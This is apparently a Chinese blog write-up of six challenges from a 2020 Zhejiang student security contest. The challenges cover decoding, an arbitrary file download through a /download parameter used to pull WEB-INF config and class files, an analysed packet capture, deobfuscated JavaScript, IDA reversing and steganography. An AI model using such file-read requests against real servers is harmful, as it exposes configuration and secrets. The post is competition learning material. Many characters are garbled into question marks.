浙江省第三届大学生网络与信息安全竞赛WP

title: 浙江省第三届大学生网络与信息安全预赛WP
date: 2020-10-2
tags: CTF,比赛
categories:

CTF
比赛

浙江省第三届大学生网络与信息安全竞赛WP

0x001 ???了

考点:

base64解码
凯撒解码

解题思路:

1、下载下来base64解码==》凯撒解码得到flag

0x002 探本溯源

考点:

/download路由存在任意?件下载

解题思路:

1、/download路由存在任意?件下载

2、下载出WEB-INF中的web.xml,能够得到处理路由的class?件名及其包路径



Archetype Created Web Application 
index.jsp 


FlagController com.hdu.ctf.controller.FlagController 
 FlagController
/flag 
 DownloadController
com.hdu.ctf.controller.DownloadController
 
DownloadController /download

在根据文件名下载对应的class文件

/FmVEcVBS4j/download?file=WEB- INF/classes/com/hdu/ctf/controller/FlagController.class

反编译后得到Java的源码

package com.hdu.ctf.controller;
import com.hdu.ctf.util.ConfigConstant;
import java.io.IOException; import java.io.PrintWriter; import java.util.Base64;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse;
public class FlagController extends HttpServlet {
/* access modifiers changed from: protected */
public void doGet(HttpServletRequest req, HttpServletResponse
resp) throws ServletException, IOException {
doPost(req, resp);
}
/* access modifiers changed from: protected */ public void doPost(HttpServletRequest req,
HttpServletResponse resp) throws ServletException, IOException {
String respMessage = "";
Base64.Encoder encoder = Base64.getEncoder(); PrintWriter pw = resp.getWriter();
try {
Boolean isFlagEquals = Boolean.valueOf(ConfigConstant.getValue("flag").equals(encoder.en codeToString(req.getParameter("str").getBytes("UTF-8"))));
if (!isFlagEquals.booleanValue()) {
respMessage = "The  flag is incorrect"; } else if (isFlagEquals.booleanValue()) {
respMessage = "The  flag is correct";
}
resp.setHeader("Content-type",
"text/html;charset=UTF-8"); resp.setCharacterEncoding("UTF-8"); pw.write(respMessage);
pw.flush();
} catch (Exception e) {
	e.printStackTrace();
		}
	}
}

flag来?com.hdu.ctf.util.ConfigConstant继续根据?件名下载出对应的class?件

/FmVEcVBS4j/download?file=WEB-
INF/classes/com/hdu/ctf/util/ConfigConstant.class

package com.hdu.ctf.util;
import java.io.FileNotFoundException; import java.io.IOException;
import java.util.Enumeration; import java.util.HashMap; import java.util.Map;
import java.util.Properties;
public class ConfigConstant {
private static Map configStr = new HashMap();
static {
try {
Properties ps = new Properties();
ps.load(ConfigConstant.class.getClassLoader().getResourceAsStream
("flag.properties"));
Enumeration<?> e = ps.propertyNames(); while (e.hasMoreElements()) {
String key = (String) e.nextElement(); configStr.put(key, ps.getProperty(key));
}
} catch (FileNotFoundException e2) {
e2.printStackTrace();
} catch (IOException e3) {
e3.printStackTrace();
}
}
public static String getValue(String key) {
return configStr.get(key);
}
}

发现flag来?flag.properties

下载下来/FmVEcVBS4j/download?file=WEB-INF/classes/flag.properties

得到base64后的flag，解base64即可

0x003 数据宝图

考点:

JS代码
wireshark流量包分析

解题思路:

1、wireshark?打开流量包,发现??有ftp流量,追踪流量之后保存为图??件发现??有个?址http://sec.hdu.edu.cn:7100/26711231cdb06a90h/

?址内是混淆的JS代码

?ω??= /‵ｍ′）?  ~┻━┻	//*′?‵*/ ['_']; o=(???)
=_=3; c=(?Θ?) =(???)-(???); (?Д?) =(?Θ?)= (o^_^o)/ (o^_^o);(?Д?)={?Θ?: '_' ,?ω??  : ((?ω??==3) +'_') [?Θ?] ,????  :(?ω??+ '_')[o^_^o -(?Θ?)] ,?Д??:((???==3) +'_')[???] }; (?Д?) [?Θ?] =((?ω??==3) +'_') [c^_^o];(?Д?) ['c'] = ((?Д?)+'_') [ (???)+(???)-(?Θ?) ];(?Д?) ['o'] = ((?Д?)+'_') [?Θ?];(?o?)=(?Д?) ['c']+(?Д?) ['o']+(?ω??  +'_')[?Θ?]+
((?ω??==3) +'_') [???] + ((?Д?) +'_') [(???)+(???)]+ ((???==3) +'_') [?Θ?]+((???==3) +'_') [(???) - (?Θ?)]+(?Д?) ['c']+((?Д?)+'_') [(???)+ (???)]+ (?Д?) ['o']+((???==3) +'_') [?Θ?];(?Д?) ['_'] =(o^_^o) [?o?] [?o?];(?ε?)=((???==3) +'_') [?Θ?]+ (?Д?) .?Д??+((?Д?)+'_') [(???) +
(???)]+((???==3) +'_') [o^_^o -?Θ?]+((???==3) +'_') [?Θ?]+ (?ω??+'_') [?Θ?]; (???)+=(?Θ?); (?Д?)[?ε?]='\\'; (?Д?).?Θ??=(?Д?+ ???) [o^_^o -(?Θ?)];(o???o)=(?ω??  +'_')[c^_^o];(?Д?) [?o?]='\"';(?Д?) ['_'] ( (?Д?) ['_'] (?ε?+/*′?‵*/(?Д?)[?o?]+ (?Д?)[?ε?]+(???)+(???)+ (?Д?)[?ε?]+((???) + (?Θ?))+(c^_^o)+(?Д?)[?ε?]+(???)+((???) + (o^_^o))+(?Д?)[?ε?]+(???)+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+(c^_^o)+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?
ε?]+(?Θ?)+(c^_^o)+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+ ((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+(c^_^o)+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?ε?]+(???)+((???) + (o^_^o))+(?Д?)[?ε?]+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+((???) + (?Θ?))+(c^_^o)+(?Д?)[?ε?]+(???)+((???) + (o^_^o))+(?Д?) [?ε?]+(?Θ?)+(???)+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(???)+(?Д?) [?ε?]+(?Θ?)+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+(???)+(o^_^o)+(?
Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(o^_^o)+(?Д?)[?ε?]+(???)+((???) + (o^_^o))+(?Д?)[?ε?]+((???) + (?Θ?))+(???)+(?Д?)[?ε?]+(?Θ?)+(???)+ ((o^_^o) +(o^_^o))+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+((???) + (?
Θ?))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+ (?Θ?)+(???)+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+(???)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((?
??) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+(c^_^o)+(?Д?)[?ε?]+((???) + (?Θ?))+(c^_^o)+(?Д?)[?
ε?]+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+(???)+(c^_^o)+(?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+(?Д?)[?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+((o^_^o) - (?Θ?))+(?Д?)[?ε?]+(???)+(c^_^o)+(?Д?) [?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+(???)+(c^_^o)+(?Д?)[?ε?]+((???) + (o^_^o))+((???) + (?Θ?))+(?Д?)[?ε?]+(???)+(c^_^o)+(?Д?)[?ε?]+(???)+(???)+(?Д?)[?ε?]+((???) + (?Θ?))+(c^_^o)+(?Д?)[?ε?]+(???)+((o^_^o) - (?Θ?))+(?Д?)[?ε?]+(???)+(c^_^o)+(?Д?)[?ε?]+(???)+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+(c^_^o)+(?Д?)[?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) + (o^_^o))+(o^_^o)+(?Д?)[?ε?]+(???)+(c^_^o)+(?Д?)[?ε?]+(???)+((o^_^o)
- (?Θ?))+(?Д?)[?ε?]+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+((o^_^o) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((???) + (?
Θ?))+(???)+(?Д?)[?ε?]+((???) + (?Θ?))+(c^_^o)+(?Д?)[?ε?]+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+((???) + (o^_^o))+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+(???)+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+((???) + (?Θ?))+(c^_^o)+(?Д?)[?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+

((???) + (o^_^o))+((???) + (?Θ?))+(?Д?)[?ε?]+((???) + (o^_^o))+((???) + (?Θ?))+(?Д?)[?ε?]+(???)+((o^_^o) - (?Θ?))+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +(o^_^o))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+(???)+((???) + (?Θ?))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(???)+(?Д?)[?ε?]+(?Θ?)+(???)+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((?
??) + (?Θ?))+((???) + (?Θ?))+(?Д?)[?ε?]+(?Θ?)+(???)+((???) + (?Θ?))+(?Д?)[?ε?]+(???)+((o^_^o) - (?Θ?))+(?Д?)[?ε?]+((???) + (?Θ?))+(?Θ?)+(?
Д?)[?ε?]+(?Θ?)+((???) + (o^_^o))+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) + (o^_^o))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+(?Θ?)+(???)+(???)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?
ε?]+(?Θ?)+((o^_^o) +(o^_^o))+((???) + (o^_^o))+(?Д?)[?ε?]+((???) + (?Θ?))+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(???)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+(?
??)+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) +
(o^_^o))+(???)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+((???) + (?Θ?))+((o^_^o) +
(o^_^o))+(?Д?)[?ε?]+(?Θ?)+((???) + (?Θ?))+(c^_^o)+(?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+((o^_^o) - (?Θ?))+(?Д?)[?ε?]+(?Θ?)+(???)+((???) + (?Θ?))+(?Д?)[?ε?]+(?Θ?)+(???)+((o^_^o) +(o^_^o))+(?Д?)[?ε?]+((???) + (o^_^o))+((???) + (?Θ?))+(?Д?)[?ε?]+(???)+((o^_^o) - (?Θ?))+(?Д?)[?
ε?]+((???) + (?Θ?))+((???) + (o^_^o))+(?Д?)[?ε?]+(?Θ?)+(c^_^o)+((???) + (?Θ?))+(?Д?)[?ε?]+(?Θ?)+(???)+(?Θ?)+(?Д?)[?ε?]+(?Θ?)+((o^_^o) + (o^_^o))+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((???) + (o^_^o))+(?Θ?)+(?Д?)[?
ε?]+(???)+((o^_^o) - (?Θ?))+(?Д?)[?ε?]+((???) + (o^_^o))+(o^_^o)+(?Д?)[?ε?]+(?Θ?)+((???) + (o^_^o))+((???) + (?Θ?))+(?Д?)[?ε?]+(???)+ (c^_^o)+(?Д?)[?ε?]+(?Θ?)+((???) + (o^_^o))+((???) + (?Θ?))+(?Д?)[?
ε?]+((???) + (?Θ?))+(?Θ?)+(?Д?)[?ε?]+((???) + (o^_^o))+(o^_^o)+(?Д?) [?o?]) (?Θ?)) ('_');

转成普通js代码

(function anonymous(
) {
$('#GoGoGo').on('click',function () {var a = $(" #pass ").val();if(a=="welcome"){window.location.href="/Easy";} }); })

输?密码welcome出flag

0x004 尺蠖求伸

考点:

main函数
base64解码

解题思路:

1、base64：WkpDVEZ7ckVfMTVfSDRyRF84VTdfVTVFZnVMfQ==

2、解密得到ZJCTF{rE_15_H4rD_8U7_U5EfuL}

0x005 司?家族

考点:

IDA的使用

解题思路:

1、

2、在IDA里都是逆向的，所以flag也是反着输出的，得到flag

0x006 樱花结局

考点:

stegsolve工具
base64解密

解题思路:

1、stegsolve，依次查看各平?可发现

2、在将字符串base64解码得到flag

CTF 比赛

浙江省第三届大学生网络与信息安全竞赛WP

浙江省第三届大学生网络与信息安全竞赛WP

0x001 ???了

考点:

解题思路:

0x002 探本溯源

考点:

解题思路:

0x003 数据宝图

考点:

解题思路:

0x004 尺蠖求伸

考点:

解题思路:

0x005 司?家族

考点:

解题思路:

0x006 樱花结局

考点:

解题思路:

相关

XCTF---easyjni的WriteUp

Youngter-drive(BUUCTF)

CTF入门学习3->Web通信基础

ctfshow web入门信息收集

Bugku CTF练习题---MISC---telnet

XCTF练习题---MISC---就在其中

XCTF练习题---MISC---normal_png

XCTF练习题---CRYPTO---wtc_rsa_bbq

bcloud_bctf_2016(house of force)

bcloud_bctf_2016(house of force)

BUU-CTF[CISCN2019 华东南赛区]Web11

BUUCTF-[CISCN2019 华东南赛区]Web4

标签